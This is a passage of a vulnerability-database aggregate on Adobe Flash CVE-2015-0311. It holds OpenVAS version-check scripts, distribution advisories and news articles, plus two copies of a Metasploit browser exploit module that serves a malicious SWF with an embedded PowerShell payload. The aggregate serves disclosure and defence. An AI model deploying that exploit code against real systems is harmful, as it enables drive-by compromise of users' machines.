script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb15-03-cve-2015-0312\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"13.0\", test_version2:\"13.0.0.262\")||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"16.0.0.287\"))\n{\n if(playerVer =~ \"^13\\.\") {\n fix = \"13.0.0.264\";\n } else {\n fix = \"16.0.0.296\";\n }\n\n report = 'Installed 
version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "description": "This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.", "modified": "2019-07-17T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310805259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805259", "type": "openvas", "title": "Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805259\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 16:33:53 +0530 (Tue, 27 Jan 2015)\");\n script_name(\"Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified\n error and double-free flaw that is triggered as user-supplied input is not\n properly validated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 13.x through\n 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.264 or 16.0.0.296 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n 
script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62432\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb15-03-cve-2015-0312\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"13.0\", test_version2:\"13.0.0.262\")||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"16.0.0.287\"))\n{\n if(playerVer =~ \"^13\\.\") {\n fix = \"13.0.0.264\";\n } else {\n fix = \"16.0.0.296\";\n }\n\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0326", "CVE-2015-0328", "CVE-2015-0329", "CVE-2015-0327", "CVE-2015-0321", "CVE-2015-0317", "CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0330", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0314", "CVE-2015-0302", "CVE-2015-0322", "CVE-2015-0324", "CVE-2015-0315", "CVE-2015-0311", "CVE-2015-0318", "CVE-2015-0307", "CVE-2015-0319", "CVE-2015-0325", "CVE-2015-0316", "CVE-2015-0306", "CVE-2015-0320", "CVE-2015-0310", "CVE-2015-0323"], "description": "Gentoo Linux Local Security Checks GLSA 201502-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121341", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310121341", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201502-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201502-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121341\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:27 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201502-02\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201502-02\");\n script_cve_id(\"CVE-2015-0301\", \"CVE-2015-0302\", \"CVE-2015-0303\", \"CVE-2015-0304\", \"CVE-2015-0305\", \"CVE-2015-0306\", \"CVE-2015-0307\", \"CVE-2015-0308\", \"CVE-2015-0309\", \"CVE-2015-0310\", \"CVE-2015-0311\", \"CVE-2015-0314\", \"CVE-2015-0315\", \"CVE-2015-0316\", \"CVE-2015-0317\", \"CVE-2015-0318\", \"CVE-2015-0319\", \"CVE-2015-0320\", \"CVE-2015-0321\", \"CVE-2015-0322\", \"CVE-2015-0323\", \"CVE-2015-0324\", \"CVE-2015-0325\", \"CVE-2015-0326\", \"CVE-2015-0327\", \"CVE-2015-0328\", \"CVE-2015-0329\", \"CVE-2015-0330\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201502-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.442\"), vulnerable: make_list(\"lt 11.2.202.442\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:05", "description": "", "published": "2015-03-12T00:00:00", "type": "packetstorm", "title": "Adobe Flash 
Player ByteArray UncompressViaZlibVariant Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2015-03-12T00:00:00", "id": "PACKETSTORM:130788", "href": "https://packetstormsecurity.com/files/130788/Adobe-Flash-Player-ByteArray-UncompressViaZlibVariant-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free', \n'Description' => %q{ \nThis module exploits an use after free vulnerability in Adobe Flash Player. The \nvulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying \nto uncompress() a malformed byte stream. This module has been tested successfully \non Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and \n16.0.0.235. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery and exploit in the wild \n'hdarwin', # Public exploit by @hdarwin89 \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-0311'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], \n['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], \n['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => OperatingSystems::Match::WINDOWS_7, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^16\\./ && ver <= '16.0.0.287' }, \n:arch => ARCH_X86 \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 28 2014', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \npsh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) \nb64_payload = Rex::Text.encode_base64(psh_payload) \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" 
value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130788/adobe_flash_uncompress_zlib_uaf.rb.txt"}], "zdt": [{"lastseen": "2018-01-03T21:23:47", "edition": 2, "description": "This Metasploit module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. 
This Metasploit module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.", "published": "2015-03-12T00:00:00", "type": "zdt", "title": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2015-03-12T00:00:00", "id": "1337DAY-ID-23380", "href": "https://0day.today/exploit/description/23380", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free vulnerability in Adobe Flash Player. The\r\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying\r\n to uncompress() a malformed byte stream. 
This module has been tested successfully\r\n on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and\r\n 16.0.0.235.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and exploit in the wild\r\n 'hdarwin', # Public exploit by @hdarwin89\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-0311'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],\r\n ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],\r\n ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^16\\./ && ver <= '16.0.0.287' },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 28 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = 
Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23380"}], "freebsd": [{"lastseen": "2019-05-29T18:33:21", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "\nAdobe reports:\n\nSuccessful exploitation could cause a crash and potentially allow\n\t an attacker to take control of the affected system. 
We are aware\n\t of reports that this vulnerability is being actively exploited in\n\t the wild via drive-by-download attacks against systems running\n\t Internet Explorer and Firefox on Windows 8.1 and below.\n\n", "edition": 4, "modified": "2015-01-22T00:00:00", "published": "2015-01-22T00:00:00", "id": "37A87ADE-A59F-11E4-958E-0011D823EEBD", "href": "https://vuxml.freebsd.org/freebsd/37a87ade-a59f-11e4-958e-0011d823eebd.html", "title": "Adobe Flash Player -- critical vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:34", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311", "CVE-2015-0310"], "description": "[](<https://4.bp.blogspot.com/-vO9W63ptsQ4/VMU-hYP074I/AAAAAAAAhl8/M4u9xsJ6VTg/s1600/adobe-flash-player-update.png>)\n\nReady to patch your Adobe Flash software now. Adobe has patched one after one two **_zero-day vulnerabilities_** in its [Adobe Flash](<https://thehackernews.com/search/label/Adobe%20Flash>) that are being actively exploited by the cyber criminals.\n\n \n\n\n**PATCH FOR FIRST ZERO-DAY**\n\nOn Thursday, the company released an emergency update for one of the critical vulnerabilities in Flash Player. However, the flaw was not the one that security researcher Kafeine reported. Adobe focused on another zero-day, identified as **_CVE-2015-0310_**, that was also exploited by Angler malicious toolkit. \n\n \n\n\n**PATCH FOR SECOND ZERO-DAY **\n\nToday, Adobe released an updated version of its Flash player software that patches a [zero-day vulnerability](<https://thehackernews.com/search/label/Zero-Day%20Vulnerability>), tracked as CVE-2015-0311, spotted by French security researcher Kafeine at the beginning of the week. 
\n\n \n\n\nThe vulnerability is \"_being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below,_\" Adobe said in a security [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-01.html>). The company defines **_CVE-2015-0311 _**as \"critical,\" which means that \"_the vulnerability, which, if exploited would allow malicious native-code to execute, potentially without a user being aware._\"\n\n \n\n\n**DRIVE-BY-DOWNLOAD ATTACKS**\n\nIn case of a **_\"drive-by-download\" attack_**, an attacker downloads a malicious software to a victim's computer without their knowledge or explicit consent. As a result, the flaw could allow remote attackers to take control of victims\u2019 Macs or PCs.\n\n \n\n\nAccording to the tests carried out by the security researcher, _CVE-2015-0311 _affected all versions of Flash Player included in any version of **_Windows operating system_**, any version of _Internet Explorer (IE)_ and Mozilla Firefox as well. However, the Google Chrome users were safe as the exploit was not triggered on Chrome.\n\n \n\n\n**AFFECTED SOFTWARE VERSIONS **\n\n * Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh\n * Adobe Flash Player 13.0.0.262 and earlier 13.x versions\n * Adobe Flash Player 11.2.202.438 and earlier versions for Linux\n\nDue to the actively exploitation of the zero-day flaw by malicious actors, the company is urging Adobe Flash Player users to update their software as soon as possible.\n\n> Adobe updated its security advisory on Saturday and stated, \"_Users who have enabled auto-update for the Flash Player desktop runtime will be receiving version 16.0.0.296 beginning on January 24. This version includes a fix for CVE-2015-0311. 
Adobe expects to have an update available for manual download during the week of January 26, and we are working with our distribution partners to make the update available in Google Chrome and Internet Explorer 10 and 11. For more information on updating Flash Player please refer to this post._\"\n\nDespite number of security problems in its software, Adobe has improved the security of its products in recent year, and we really appreciate for its quick response and management to roll a patch before the company scheduled to deliver it.\n", "modified": "2015-01-25T19:11:50", "published": "2015-01-25T08:11:00", "id": "THN:52D71A1567BF0E67D7740044EBED3202", "href": "https://thehackernews.com/2015/01/adobe-flash-player-update.html", "type": "thn", "title": "Adobe patches 2nd Flash Player Zero-day Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:33", "bulletinFamily": "info", "cvelist": ["CVE-2015-0313", "CVE-2015-0311", "CVE-2015-0310"], "description": "[](<https://4.bp.blogspot.com/-ZR_eZUqH9J4/VM-zvWG3m1I/AAAAAAAAhsM/VKJKFve5iBw/s1600/adobe-flash-zero-day-vulnerability.png>)\n\nWarning for Adobe users! Another _zero-day vulnerability_ has been discovered in **_[Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash%20Player>) _**that is actively being exploited by cyber crooks in drive-by download attacks, security researchers warned today. \n\n \n\n\nThis is for the third time in last few weeks when Adobe is dealing with a zero day vulnerability in Flash Player. The Adobe Flash Player Vulnerability identified as **__CVE-2015-0313__**, exists in the latest version of Flash Player, i.e. 
version 16.0.0.296 and earlier.\n\n \n\n\nIn late January, Adobe released an [updated version of its Flash player](<https://thehackernews.com/2015/01/adobe-flash-player-update.html>) software that patches zero-day vulnerability, tracked as _CVE-2015-0311_, spotted by French security researcher Kafeine. This Adobe Flash Player Vulnerability was also being actively exploited via Malvertisement and drive-by-download attacks.\n\n \n\n\nIn case of a \"drive-by-download\" attack, an attacker downloads a malicious software to a victim's computer without their knowledge or explicit consent. As a result, the flaw could allow remote attackers to take control of victims\u2019 Macs or PCs.\n\n \n\n\nOn January 22, the company released an emergency update for second zero-day flaw, identified as CVE-2015-0310, that was circulating and exploited by Angler malicious toolkit.\n\n \n\n\nIn a [security advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-02.html>) released Monday, Adobe officials said that they are working on a patch and planning to release it sometime this week. The Adobe Flash Player zero-day vulnerability targets computers running all versions of Internet Explorer and Mozilla Firefox, on Windows 8.1 and earlier. In addition to Windows, the flaw affects Flash on OS X and Linux. \n\n \n\n\nThis newest zero-day vulnerability in Flash reportedly is being used by the Angler kit, as well. If successfully exploited, the vulnerability could cause a crash and potentially allow criminal hackers to take control of the affected system.\n\n \n\n\nCybercriminals are currently using this zero-day flaw in a malvertising campaign on a popular video sharing site Dailymotion, with other websites thought to be affected as the infections were launched via advertising platform and not the website content itself. 
\n\n \n\n\nVisitors to any of the affected sites would have been redirected to a series of websites and finally landed on a page controlled by attackers, hosting an exploit kit. This exploit kit would attempt to compromise the target system by exploiting the Adobe Flash zero-day flaw.\n\n \n\n\nSecurity firm Trend Micro, who reported the zero-day to Adobe, had been tracking this Flash zero-day vulnerability since January 14 and had been working with Adobe to fix the issue. \n\n> Trend Micro [said](<http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/>) it had \"_seen around 3,294 hits related to the exploit_\". The firm is recommending users \"_consider disabling Flash Player until a fixed version is released_\".\n\n> \"_We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below,_\" Adobe said in its own advisory.\n\nAdobe didn\u2019t specify the day on which the patch would be released, but said it would release a fix for this \"critical vulnerability\" this week. Users who are concerned about this security issue can **__temporarily disable Adobe Flash in the browsers__**. \n \n**SECURITY PATCH RELEASES [UPDATE (5/2/2015)]** \nAdobe has released [security updates for Adobe Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-04.html>) for Windows, Macintosh and Linux in order to patch a _zero-day vulnerability_, identified as **_CVE-2015-0313_**, that could potentially allow an attacker to take control of the affected system. 
\n \nThe company recommends its users to update their software installations to the latest versions: \n\n\n * Users of the Adobe Flash Player desktop versions for Windows and Macintosh should update to Adobe Flash Player 16.0.0.305\n * Users of the Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.269\n * Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.442\n * Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, will automatically update to version 16.0.0.305\n", "modified": "2015-02-05T18:57:31", "published": "2015-02-02T06:29:00", "id": "THN:40B2D007112A9624A902E319B3C1366B", "href": "https://thehackernews.com/2015/02/adobe-flash-zero-day-vulnerability_2.html", "type": "thn", "title": "Another Unpatched Adobe Flash Zero-Day vulnerability Exploited in the Wild", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0310", "CVE-2015-0311", "CVE-2015-0312"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-02, and\nAPSB15-03, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. 
(CVE-2015-0310, CVE-2015-0311, CVE-2015-0312)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.440.\n", "modified": "2018-06-07T09:04:19", "published": "2015-01-27T05:00:00", "id": "RHSA-2015:0094", "href": "https://access.redhat.com/errata/RHSA-2015:0094", "type": "redhat", "title": "(RHSA-2015:0094) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0235", "CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0302", "CVE-2015-0311", "CVE-2015-0307", "CVE-2015-0306"], "description": "- CVE-2015-0311 (remote code execution)\n\nUnspecified vulnerability allows remote attackers to execute arbitrary\ncode via unknown vectors, as exploited in the wild in January 2015.\n\n- CVE-2015-0309 (remote code execution)\n\nHeap-based buffer overflow allows attackers to execute arbitrary code\nvia unspecified vectors, a different vulnerability than CVE-2015-0304.\n\n- CVE-2015-0308 (remote code execution)\n\nUse-after-free vulnerability allows attackers to execute arbitrary code\nvia unspecified vectors.\n\n- CVE-2015-0307 (memory leaks, denial of service)\n\nA vulnerability allows remote attackers to obtain sensitive information\nfrom process memory or cause a denial of service (out-of-bounds read)\nvia unspecified vectors.\n\n- CVE-2015-0306 (remote code execution, denial of service)\n\nA vulnerability allows attackers to execute arbitrary code or cause a\ndenial of service (memory corruption) via unspecified vectors, a\ndifferent vulnerability than CVE-2015-0303.\n\n- CVE-2015-0305 (remote code execution)\n\nA vulnerability allows attackers to execute arbitrary code by leveraging\nan unspecified "type confusion".\n\n- CVE-2015-0304 (remote code execution)\n\nHeap-based buffer overflow allows 
